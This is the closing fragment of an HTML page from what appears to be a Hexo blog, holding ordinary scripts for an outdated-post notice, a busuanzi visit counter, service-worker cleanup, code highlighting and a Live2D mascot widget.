      const blockquote = _$('#outdate-blockquote');
      if (blockquote) {
        blockquote.querySelector('p').innerText = message;
        blockquote.style.display = 'block';
      }
    }
  }
</script>


  
<script src="https://npm.webcache.cn/busuanzi@2.3.0/bsz.pure.mini.js" async></script>




<script>
  if ('serviceWorker' in navigator) {
    navigator.serviceWorker.getRegistrations().then((registrations) => {
      for (let registration of registrations) {
        registration.unregister();
      }
    });
  }
</script>

  <!-- hexo injector body_end start -->
<script src="/js/insert_highlight.js" data-pjax></script>
<!-- hexo injector body_end end --><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script><!-- hexo-inject:begin --><!-- hexo-inject:end --></body>
  </html>

